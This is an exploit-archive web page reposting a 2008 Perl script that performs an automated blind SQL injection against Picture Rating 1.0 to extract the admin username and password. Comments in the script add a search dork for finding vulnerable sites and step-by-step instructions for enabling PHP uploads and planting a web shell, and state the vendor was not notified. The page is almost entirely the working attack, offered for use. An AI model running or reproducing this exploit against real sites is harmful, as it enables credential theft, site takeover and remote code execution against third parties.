首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Picture Rating 1.0 Blind SQL Injection Exploit 来源：h4ck-y0u.org 作者：t0pP8uZz 发布时间：2008-04-07   #!/usr/bin/perl # -- Picture Rating 1.0 Blind SQL Injection Exploit -- # -Info/Instructions- # After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/ # ok once you have logged in has admin you can upload a shell, click "edit settings" and under the allowed extensions, add ".php" ok now # register as a normal user or backup the database and get a existing users and login to the main site and navigate to upload image/photo and choose your shell and click upload # the shell should successfully upload and now you will see a broken image, right click the broken image icon and get the link, navigate to this link in your browser and thats your shell ;) # Vendor Not Notified # Discovered By: t0pP8uZz # Discovered On: 6 April 2008 # greetz: milw0rm.com, h4ck-y0u.org, ciphercrew! # inurl:"index.php?cmd=" Latest Pictures hot # -- Picture Rating 1.0 Blind SQL Injection Exploit -- use strict; use LWP::Simple; print "---------- Picture Rating 1.0 Blind SQL Injection Exploit ----------\n"; print "-  Discovered && Coded By: t0pP8uZz                                -\n"; print "-                                  Discovered On: 6 April 2008     -\n"; print "-                                                                  -\n"; print "-   This exploit will perform a automated BLIND SQL attack on ..   -\n"; print "-   .. the target host which is running the script.                -\n"; print "--------------------------------------------------------------------\n"; print "\nEnter URL (ie: http://site.com/): "; chomp(my $url=<STDIN>); if(inject_test($url)) { print "Injecting.. Please Wait this could take several minutes..\n\n"; my $details = blind($url); print "Exploit Success! Admin Details: ".$details; exit; } sub blind { my $url    = shift; my $res    = undef; my $chr    = 48; my $substr = 1; my $done   = 1; while($done) { my $content = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM admin),".$substr.",1))=".$chr."/*"); if($content =~ /Previous/ && $chr == 94) { $done = 0; } elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; } else { $chr++; } } return $res; } sub inject_test { my $url     = shift; my $true    = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=1"); my $false   = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=2"); if($true =~ /Previous/ && $false !~ /Previous/) { print "\nTarget Site Vulnerable!\n\n"; return 1; } else { print "\nTarget Site Not Vulnerable! Exiting.."; exit; } }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Sun Solaris <= 10 rpc.ypupdate ·Apache Tomcat Connector jk2-2. ·MS Visual Basic Enterprise Ed. ·SCO UnixWare Merge mcd Local R ·Drake CMS <= 0.4.11 Remote Bli ·SCO UnixWare Reliant HA Local ·LinPHA <= 1.3.2 (maps plugin) ·SCO UnixWare < 7.1.4 p534589 ( ·Data Dynamics ActiveBar (Actba ·Xitami Web Server v2.5c2 LRWP ·Tumbleweed SecureTransport Fil ·Microsoft Visual InterDev 6.0   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved